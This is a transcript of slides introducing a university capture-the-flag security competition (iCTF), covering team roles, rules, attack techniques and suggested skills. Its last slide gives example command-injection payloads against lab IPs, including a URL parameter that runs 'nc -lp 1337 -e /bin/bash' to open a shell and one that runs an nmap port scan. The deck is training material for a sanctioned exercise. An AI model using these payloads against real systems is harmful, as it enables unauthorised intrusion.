Presentation is loading. Please wait.

Presentation is loading. Please wait.

CAPTURE THE FLAG Introductions beer brew man dutchrowboat.

Similar presentations


Presentation on theme: "CAPTURE THE FLAG Introductions beer brew man dutchrowboat."— Presentation transcript:

1 CAPTURE THE FLAG Introductions beer brew man dutchrowboat

2

3 Teams  Firewall  IDS/IPS  Services – Attack and Defense  PHP, Perl, Ruby, Python, Java  Analysis  Wireshark, etc.  C/ASM  Operating System  Apache, OS Configuration, etc.

4 iCTF  Came from Defcon  iCTF ran by UCSB  No test required – just edu  “Largest existing live security exercise”  Test Skills of understanding security

5 What is it?  A variety of Internet enabled services  Services comprised of:  PHP  Perl  Shell Scripts  C++  MySQL  Apache/lighttpd  SSH  XML RPC  FTP

6 What to do  All services should be protected  Patch  IPS/IDS  All services should be attacked

7

8 Blender  SNAT with weights?  Is it real?

9 Rules  No DOS  All traffic is penalized  Must stay on internal network  Don't prevent legitimate traffic  Don't break rules  If attack service, don't launch DOS from compromised machine  2005 Defcon – hack the scorebot

10 Attack Techniques  Buffer overflows  Format string attacks  Shell attacks  Race conditions  Misconfigurations  Authentication attacks  Web-based attacks  Directory traversal  Cookie-based services  Cross-site scripting  Server-side applications  Lack of parameter validation (e.g., SQL injection)‏

11 Skills  Scanning  Firewalling  Intrusion Detection  Vulnerability analysis  For each type of vulnerability  How to identify a vulnerability  How to exploit a vulnerability  How to patch a vulnerability (without disrupting the get/set flag methods) ‏  How to detect a vulnerability  For each service  How to monitor the requests to a service  How to monitor the execution of a request  Protocol security analysis  Application security analysis

12 Vigna's Suggestions  Have a structured team with clear responsibilities  The Perl/Python/PHP group  The SQL/database group  The flaw-finder group  The firewall group  The IDS group  The C-based exploit group  Have a leader responsible for coordination and integration  Have a way to intercept socket connections and apply regexes/substitutions  Have vulnerability analysis tools handy  Have a “human IDS”  Remember: the game lasts only a few hours

13 Not the first time…

14 2009

15

16 Questions ? http://athena.uccs.edu/ictf

17 Backups…

18 Test Network Real Network Image 10.10.1.2 10.10.1.3 Vuln 10.10.1.4 Team Hub Team Box 10.10.1.1 Mon Box 10.10.1.x Attack Boxes Console for Fixes Image Test Box Vuln Patch Test Vuln Attack Box UCCS Boxes UCCS Boxes

19 Some Examples  echo GET / | nc 10.110.134.123 80 >./myoutput.txt  http://10.100.134.77/users/url3@l. php?command=nc -lp 1337 -e /bin/bash  http://10.100.134.77/users/url3@l. php?command=nmap -p 1-65535 10.120.134.222 > port.txt


Download ppt "CAPTURE THE FLAG Introductions beer brew man dutchrowboat."

Similar presentations


Ads by Google